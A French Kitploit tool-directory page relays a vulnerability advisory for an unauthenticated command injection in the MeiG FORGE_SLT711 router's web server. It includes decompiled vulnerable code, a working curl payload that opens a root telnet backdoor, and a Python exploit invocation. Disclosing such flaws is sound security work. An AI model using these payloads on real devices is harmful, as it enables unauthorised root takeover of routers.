Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-36356 — CVE-2026-36356: MeiG Smart FORGE_SLT711 GoAhead - Injection de commandes OS non authentifiée (RCE en tant que root) | Kitploit
Outils/GitHubGitHub/totekuh/cve-2026-36356
Sécurité IoTAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionCommandement et ContrôleDéveloppement de Charges Utiles
GitHubtotekuh/cve-2026-36356

CVE-2026-36356

CVE-2026-36356: MeiG Smart FORGE_SLT711 GoAhead - Injection de commandes OS non authentifiée (RCE en tant que root)

Voir le dépôt
1il y a 3 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2026-36356 : MeiG Smart FORGE_SLT711 GoAhead — Injection de commande système non authentifiée (/action/SetRemoteAccessCfg)

  • CVE : CVE-2026-36356
  • CWE : CWE-78, CWE-306
  • Découvreur : Daniil Gordeev
  • Divulgué : 2026-05-03

Résumé

Le serveur web GoAhead fourni avec les appareils CPE 4G LTE MeiG Smart FORGE_SLT711 expose un point de terminaison HTTP non authentifié, /action/SetRemoteAccessCfg, qui interpole une entrée JSON contrôlée par l'utilisateur dans une commande shell sans assainissement. Une seule requête POST non authentifiée exécute des commandes arbitraires en tant que root.

Deux causes racines indépendantes : une entrée de route d'authentification manquante et une construction sprintf() → system() non sûre dans le gestionnaire.

Produits concernés

  • Vendeur : MeiG Smart Technology Co., Ltd. (Shenzhen, Chine)
  • Produit : routeur CPE 4G LTE FORGE_SLT711
  • Micrologiciel confirmé : MDM9607.LE.1.0-00110-STD.PROD-1 (micrologiciel du modem BC-MGST711H_1.1.1_EQ101)
  • Serveur web : GoAhead 3.x (Embedthis) avec des gestionnaires d'action personnalisés MeiG (/usr/bin/goahead)

Le code vulnérable se trouve dans le gestionnaire d'action personnalisé de MeiG, pas dans GoAhead en amont. D'autres versions du micrologiciel de cette gamme de produits sont probablement concernées ; non vérifié indépendamment.

Environnement de test

AppareilOrtel 4G LTE CPE (OEM : MeiG FORGE_SLT711)
SoCQualcomm MDM9607, ARMv7 Cortex-A7
NoyauLinux 3.18.48
MicrologicielMDM9607.LE.1.0-00110-STD.PROD-1
Date

Détails techniques

Authentification manquante (CWE-306)

La configuration des routes GoAhead /var/www/route.txt répertorie les routes authentifiées (lignes 64–150) à l'aide de auth=basic. /action/SetRemoteAccessCfg n'est pas dans cette liste. Le routage retombe sur la règle fourre-tout à la ligne 156 :

root@kitploit:~
route uri=/action handler=action

La règle fourre-tout n'a pas de auth=basic, donc tout client HTTP peut invoquer /action/SetRemoteAccessCfg sans identifiants.

Injection de commande (CWE-78)

Le gestionnaire à l'offset 0x0003c6d8 dans /usr/bin/goahead se décompile en :

root@kitploit:~
char password_buf[64];      // 0x40 bytes on stack
char command_buf[256];      // 0x100 bytes on stack

websGetJsonItemValue(json, "password", STRING, password_buf, 0x40);
sprintf(command_buf, "echo root:\"%s\"|chpasswd", password_buf);
system(command_buf);

Le champ password est interpolé entre guillemets doubles. La substitution $(...) et les backticks `...` sont interprétées entre guillemets doubles, de sorte qu'un attaquant contrôle la commande shell. system() s'exécute avec uid=0 car le processus GoAhead s'exécute en tant que root. Aucune validation d'entrée, aucun échappement, aucune liste blanche de caractères.

Preuve de concept

Porte dérobée telnet persistante

root@kitploit:~
curl -s -X POST http://192.168.1.1/action/SetRemoteAccessCfg \
  -H "Content-Type: application/json" \
  -d '{"password":"$(telnetd -l /bin/sh -p 2323 &)"}'
# Reachable via: telnet 192.168.1.1 2323 (root shell, no password)

RCE non authentifiée → shell root sur un MeiG FORGE_SLT711 (Ortel 4G LTE CPE) via /action/SetRemoteAccessCfg

Exploit Python de référence

poc_rce.py (publié en même temps que cet avis) :

root@kitploit:~
python3 poc_rce.py --ip 192.168.1.1 --cmd 'id > /tmp/out'

L'exploitation est aveugle — la sortie de la commande n'est pas dans la réponse HTTP.

Contraintes de la charge utile

  • tampon password : 64 octets
  • tampon de commande final : 256 octets
Télécharger l’outil
2026-02-21